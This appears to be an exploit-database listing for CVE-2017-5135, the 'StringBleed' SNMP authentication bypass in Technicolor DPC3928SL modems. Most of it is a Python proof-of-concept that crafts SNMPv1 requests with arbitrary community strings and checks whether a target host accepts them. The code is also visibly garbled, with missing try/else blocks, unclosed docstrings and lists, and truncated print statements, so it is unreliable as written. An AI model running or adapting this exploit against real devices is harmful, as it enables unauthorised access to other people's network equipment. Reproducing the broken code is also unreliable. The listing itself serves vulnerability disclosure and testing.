Technicolor DPC3928SL - SNMP Authentication Bypass

EKU-ID: 7174 CVE: 2017-5135 OSVDB-ID:
Author: nixawk Published: 2017-12-22 Verified: Verified



# -*- coding: utf-8 -*-
# StringBleed - CVE-2017-5135
__author__ = ["Nixawk"]
__funcs__ = [
import struct
import uuid
import socket
import time
import logging
import contextlib
log = logging.getLogger(__file__)
def generate_snmp_communitystr():
    return str(uuid.uuid4())
def generate_snmp_proto_payload(community):
    """Generate snmp request with [SNMPv1] and [OID:]
    For example, suppose one wanted to identify an instance of the
    variable sysDescr The object class for sysDescr is:
         iso org dod internet mgmt mib system sysDescr
          1   3   6     1      2    1    1       1
    # SNMPv1 specifies five core protocol data units (PDUs).
    # All SNMP PDUs are constructed as follows:
    # ---------------------
    # | IP header         |
    # ---------------------
    # | UDP header        |
    # --------------------- -------|
    # | version           |        |
    # | community         |        |
    # | PDU-type          |        |
    # | request-id        |        |---- SNMP
    # | error-status      |        |
    # | error-index       |        |
    # | variable bindings |        |
    # --------------------- -------|
    # The seven SNMP protocol data unit (PDU) types are as follows:
    # GetRequest
    # SetRequest
    # GetNextRequest
    # GetBulkRequest
    # Response
    # Trap
    # InformRequest
    # SNMPv1 Message Header
    # SNMPv1 Trap Message Hander
    # +-----------------------------------------------------------------+
    # | Table 1 (Page 1 of 2). SNMP GET PDU for dpiPortForTCP.0         |
    # +---------------+----------------+--------------------------------+
    # | OFFSET        | VALUE          | FIELD                          |
    # +---------------+----------------+--------------------------------+
    # | 0             | 0x30           | ASN.1 header                   |
    # +---------------+----------------+--------------------------------+
    # | 1             | 37 + len       | PDU_length, see formula below  |
    # +---------------+----------------+--------------------------------+
    # | 2             | 0x02 0x01 0x00 | SNMP version:                  |
    # |               |                | (integer,length=1,value=0)     |
    # +---------------+----------------+--------------------------------+
    # | 5             | 0x04           | community name (string)        |
    # +---------------+----------------+--------------------------------+
    # | 6             | len            | length of community name       |
    # +---------------+----------------+--------------------------------+
    # | 7             | community name | varies                         |
    # +---------------+----------------+--------------------------------+
    # | 7 + len       | 0xa0 0x1c      | SNMP GET request:              |
    # |               |                | request_type=0xa0,length=0x1c  |
    # +---------------+----------------+--------------------------------+
    # | 7 + len + 2   | 0x02 0x01 0x01 | SNMP request ID:               |
    # |               |                | integer,length=1,ID=1          |
    # +---------------+----------------+--------------------------------+
    # | 7 + len + 5   | 0x02 0x01 0x00 | SNMP error status:             |
    # |               |                | integer,length=1,error=0       |
    # +---------------+----------------+--------------------------------+
    # | 7 + len + 8   | 0x02 0x01 0x00 | SNMP index:                    |
    # |               |                | integer,length=1,index=0       |
    # +---------------+----------------+--------------------------------+
    # | 7 + len + 11  | 0x30 0x11      | varBind list, length=0x11      |
    # +---------------+----------------+--------------------------------+
    # | 7 + len + 13  | 0x30 0x0f      | varBind, length=0x0f           |
    # +---------------+----------------+--------------------------------+
    # | 7 + len + 15  | 0x06 0x0b      | Object ID, length=0x0b         |
    # +---------------+----------------+--------------------------------+
    # | 7 + len + 17  | 0x2b 0x06 0x01 | Object-ID:                     |
    # |               | 0x04 0x01 0x02 |          |
    # |               | 0x02 0x01 0x01 | Object-instance: 0             |
    # |               | 0x01 0x00      |                                |
    # +---------------+----------------+--------------------------------+
    # | 7 + len + 28  | 0x05 0x00      | null value, length=0           |
    # +---------------+----------------+--------------------------------+
    # | NOTE:  Formula to calculate "PDU_length":                       |
    # |                                                                 |
    # |   PDU_length =  length of version field and string tag (4 bytes)|
    # |              +  length of community length field (1 byte)       |
    # |              +  length of community name (depends...)           |
    # |              +  length of SNMP GET request (32 bytes)           |
    # |                                                                 |
    # |              =  37 + length of community name                   |
    # +-----------------------------------------------------------------+
    snmp_GetNextRequest = [
        b"\x30",                             # ASN.1 Header
        b"\x29",                             # PDU length
        b"\x02\x01\x00",                     # SNMP Version
        b"\x04",                             # Community Name (string)
        chr(len(community)),                 # Community Length
        community,                           # Community String
        b"\xa1\x19",                         # PDU Type - GetNextRequest
        struct.pack("<i", int(time.time())), # Request ID
        b"\x02\x01\x00",                     # Error Status (Type)
        b"\x02\x01\x00",                     # Error Index
        b"\x30",                             # Variable Type (Sequence)
        b"\x0b",                             # Length
        b"\x30",                             # Variable Type (Sequence)
        b"\x09",                             # Length
        b"\x06",                             # Variable Type (OID)
        b"\x05",                             # Length
        b"\x2b\x06\x01\x02\x01",             # Value
        b"\x05\x00"  # NULL
    pkt = "".join(snmp_GetNextRequest)
    com_length = chr(len(community))
    pdu_length = chr(len(pkt) - 2)      # community length cost 1 bytes (default)
    if com_length > '\x7f':
        com_length = '\x81' + com_length
        pdu_length = chr(len(pkt) - 1)  # community length cost 2 bytes
    if pdu_length > '\x7f':
        pdu_length = '\x81' + pdu_length
    snmp_GetNextRequest[1] = pdu_length
    snmp_GetNextRequest[4] = com_length
    pkt = b"".join(snmp_GetNextRequest)
    return pkt
def send_snmp_request(host, port, community, timeout=6.0):
    """Send snmp request based on UDP.
    data = ''
        with contextlib.closing(socket.socket(socket.AF_INET, socket.SOCK_DGRAM)) as client:
            snmp_raw = generate_snmp_proto_payload(community)
            client.sendto(snmp_raw, (host, port))
            data, _ = client.recvfrom(2014)
    except Exception as err:
        log.error("{} : {} - {}".format(host, port, err))
    return data
def read_snmp_communitystr(snmp_response):
    """Parse snmp response based on RFC-1157 (
    community_str = ''
    if not snmp_response:
        return community_str
    pdu_length = snmp_response[1]  # "\x30\x26\x02\x01", "\x30\x81\xea\x02\x01"
    if ord(pdu_length) > 0x7f:
        offset = 8  # "\x30\x81\xea\x02\x01\x00\x04\x24"
        offset = 7  # "\x30\x26\x02\x01\x00\x04\x06"
    community_length = snmp_response[offset - 1]
    community_str = snmp_response[offset: offset +ord(community_length)]
    return community_str
def read_snmp_varbindstr(snmp_response):
    """Parse snmp response based on RFC-1157 (
    variable_binding_string = ''
    if not snmp_response:
        return variable_binding_string
    pdu_length = snmp_response[1]  # "\x30\x26\x02\x01", "\x30\x81\xea\x02\x01"
    if ord(pdu_length) > 0x7f:
        offset = 8  # "\x30\x81\xea\x02\x01\x00\x04\x24"
        offset = 7  # "\x30\x26\x02\x01\x00\x04\x06"
    community_length = snmp_response[offset - 1]
    pdu_data_offset = offset + ord(community_length)
    pdu_data = snmp_response[pdu_data_offset:]  # 8 = first snmp 8 bytes
    last_pdu = pdu_data.split("\x00")[-1]
    # if data > 127 (0x7f), variable-bindings length: 3 bytes
    # if data < 127 (0x7f), variable-bindings length: 2 bytes
    last_pdu_length = ord(last_pdu[1])
    if last_pdu_length > 0x7f:
        variable_binding_string =  last_pdu[3:]
        variable_binding_string = last_pdu[2:]
    return variable_binding_string
def snmp_login(host, port, community):
    """login snmp service with SNMPv1 community string.
    login_status = False
        resp_community = read_snmp_communitystr(
            send_snmp_request(host, int(port), community)
        if (resp_community == community):
            login_status = True
    except Exception as err:
    return login_status
def snmp_stringbleed(host, port, community):
    """Test againsts Snmp StringBleed CVE-2017-5135.
    stringbleed_status = False
        resp_varbindstr = read_snmp_varbindstr(
                send_snmp_request(host, int(port), community)
        if resp_varbindstr: stringbleed_status = True
    except Exception as err:
    return stringbleed_status
if __name__ == '__main__':
    import sys
    if len(sys.argv) != 4:"Usage python {} <snmp-host> <snmp-port> <snmp-community-str>".format(sys.argv[0]))
    host = sys.argv[1]
    port = sys.argv[2]
    community = sys.argv[3]
    if snmp_login(host, int(port), community):"{}:{} - [{}] snmp login successfully.".format(host, port, community))
    else:"{}:{} - [{}] snmp login failed.".format(host, port, community))
    if snmp_stringbleed(host, int(port), community):"{}:{} - [{}] snmp StringBleed successfully.".format(host, port, community))
    else:"{}:{} - [{}] snmp StringBleed failed.".format(host, port, community))
## References